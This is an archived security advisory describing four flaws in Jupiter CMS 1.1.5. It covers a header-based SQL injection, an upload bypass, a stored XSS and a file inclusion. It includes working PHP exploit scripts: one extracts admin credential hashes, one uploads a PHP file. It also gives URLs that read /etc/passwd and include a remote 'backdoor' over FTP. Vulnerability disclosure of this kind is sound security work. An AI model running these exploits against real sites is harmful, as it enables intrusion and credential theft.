TUCoPS :: Web :: CMS / Portals :: c07-2339.htm

Jupiter CMS 1.1.5 Multiple Vulnerabilities
Jupiter CMS 1.1.5 Multiple Vulnerabilities
Jupiter CMS 1.1.5 Multiple Vulnerabilities

       Title:    Jupiter CMS 1.1.5 Multiple Vulnerabilities
 Advisory ID:    12070214
  Risk level:    High
Author: DarkFig  
URL: http://www.acid-root.new.fr/advisories/12070214.txt 


  Jupiter CMS 1.1.5 is a powerful user-friendly Community Management System.
Advanced boxes/block system, members management, high-end forums, topics,
statistics, emoticons/logs management. A new version is actually in coding,
however the latest stable version is 1.1.5. 

  I decided to download it because a friend tell me that he was going to use
it for his website and he asked me if I could audit it. The first thing I
realised is that they directly used the $_SERVER array (without protection
against SQL Injection attacks) in several SQL request. The second vulnerability
i found, is that the script do not check for file extensions when a user upload
an emoticon, and the access protection of the "modules" directory files can be
bypassed. There is also a remote/local file inclusion with the "n" parameter,
and a permanent XSS.

.: [ VULN #1 ]

Risk level: Medium
   Summary: find_ip() SQL Injection
Conditions: None

  The script "includes/functions.php" contains the following functions:

function find_ip() {
   if (getenv('HTTP_CLIENT_IP')) $ip = getenv('HTTP_CLIENT_IP');
   elseif (getenv('HTTP_X_FORWARDED_FOR')) $ip = getenv('HTTP_X_FORWARDED_FOR');
   elseif (getenv('HTTP_X_FORWARDED')) $ip = getenv('HTTP_X_FORWARDED');
   elseif (getenv('HTTP_FORWARDED_FOR')) $ip = getenv('HTTP_FORWARDED_FOR');
   elseif (getenv('HTTP_FORWARDED')) $ip = getenv('HTTP_FORWARDED');
   else $ip = $_SERVER['REMOTE_ADDR'];
return $ip;

  This function is called from others PHP scripts in order to determine the IP
of the client. But the majority of headers can be modified by the user. For the
most part of the time, this function is used in SQL requests. For example, the
script "index.php" contains the following SQL request:

$ban_ip_check = $db->getLine("SELECT ip, date FROM bans WHERE ip = '".find_ip()."'");
if($ban_ip_check != FALSE) {
'http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $hev = "-1' UNION SELECT CONCAT('" ."[BEGIN_XPL_USER]'," ."(SELECT username FROM users LIMIT 0,1),'" ."[END_XPL_USER]','" ."[BEGIN_XPL_PWD]'," ."(SELECT password FROM users LIMIT 0,1),'" ."[END_XPL_PWD]'),1 #"; $xpl->addheader("Client-IP",$hev); $xpl->get($url); preg_match("#\[BEGIN_XPL_USER\](.*)\[END_XPL_USER\]#",$xpl->getcontent(),$usr); preg_match("#\[BEGIN_XPL_PWD\]([a-z0-9]{32})\[END_XPL_PWD\]#",$xpl->getcontent(),$pwd); print $usr[1].'::'.$pwd[1]; # # EOF POC #1 .: [ VULN #2 ] Risk level: High Summary: File Upload Vulnerability Conditions: register_globals = On All scripts situated in the "modules" directory can be executed by a guest, for example let's see "modules/emoticons.php" access protection : if(isset($is_guest) || isset($is_user)) { header("location: $PHP_SELF?i=2"); exit; } An attacker can access to this script, simply by sending a GET request which contains the "is_guest" and "is_user" variables. For the most part of the time, this is not critical because the script use several functions stored in other files (not include), this return a Fatal Error. But if the "a" parameter is set to 1 the script "modules/emoticons.php" let us upload a file, before producing a Fatal Error. Let's see the upload protection: $allowed_types = array('image/gif', 'image/jpeg', 'image/pjpeg', 'image/png', 'image/x-png'); if(!in_array($uploaded_file['type'],$allowed_types)){ header("location: $PHP_SELF?n=modules/emoticons&i=30");exit; } So what we have to do to bypass this protection, is just to modify the "Content-Type" header. This poc illustrate how an attacker can upload a malicious php file: # File Upload Vulnerability (POC #2) # require("phpsploitclass.php"); error_reporting(E_ALL ^ E_NOTICE); $url = 'http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $arr = array(frmdt_url => $url, "is_guest" => 1, "is_user" => 1, "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "")); $xpl->formdata($arr); $xpl->get($url.'images/emoticons/iamaphpfile.php'); print($xpl->getcontent()); # # EOF POC #2 .: [ VULN #3 ] Risk level: Low Summary: "Logged Guests" XSS Conditions: None The script "index.php" insert (in the database) some informations sent by the web browser. if(!isset($_SESSION['in_site'])) { $db->insertRow("online",array('sid' => ''.$session_id.'', 'type' => 'live','status' => 'guest','user' => NULL,'user_id' => NULL, 'user_authorization' => NULL,'user_email' => NULL,'user_hideemail' => NULL, 'user_flag' => NULL,'user_location' => NULL,'ip' => ''.find_ip().'', 'refer' => ''.$_SERVER['HTTP_REFERER'].'','browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'', 'lang' => ''.$lang.'','date' => ''.time().'')); $db->insertRow("online",array('sid' => ''.$session_id.'','type' => 'log', 'status' => 'guest','user' => NULL,'user_id' => NULL,'user_authorization' => NULL, 'user_email' => NULL,'user_hideemail' => NULL,'user_flag' => NULL,'user_location' => NULL, 'ip' => ''.find_ip().'','refer' => ''.$_SERVER['HTTP_REFERER'].'', 'browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'','lang' => ''.$lang.'', 'date' => ''.time().'')); $_SESSION['in_site'] = 1; } All data inserted in the database are protected against SQL Injection attacks, however they're not protected against XSS. This is a permanent XSS, the malicious code will be executed when the admin will click on "Logged Guest". Proof of concept: # "Logged Guest" XSS Vulnerability (POC #3) # require("phpsploitclass.php"); error_reporting(E_ALL ^ E_NOTICE); $url = 'http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $xpl->addheader("Referer", ""); $xpl->get($url); # # EOF POC #3 .: [ VULN #4 ] Risk level: High Summary: Local/Remote File Inclusion Conditions: LFI: magic_quotes_gpc = Off RFI: PHP >= 5.0.0, allow_url_fopen = On The script "index.php" contains the following code: if(isset($n)) { if(file_exists("$n.php")) { if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error"); else include("$n.php"); } elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error"); } The "n" parameter isn't properly filtered, this can lead to file inclusion. Local file inclusion will work if magic_quotes_gpc=Off, the null byte char \x00 is required. Remote file inclusion will work if the server is running on PHP >= 5. In this version, the file_exists() function can be used with some URL wrappers, you can use ftp:// for example. Simple poc: LFI: http:///index.php?n=/etc/passwd%00 RFI: http:///index.php?n=ftp://user:password@example.com/backdoor .: [ LINKS ] [1] PhpSploit Class http://www.acid-root.new.fr/tools/03061230.txt [2] FTP/FTPS with PHP http://www.php.net/manual/en/wrappers.ftp.php [3] Good paper about File Upload Vulnerability http://shsc.info/FileUploadSecurity [4] X-Forwarded-For http://en.wikipedia.org/wiki/X-Forwarded-For [5] AcidRoot http://www.acid-root.new.fr

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH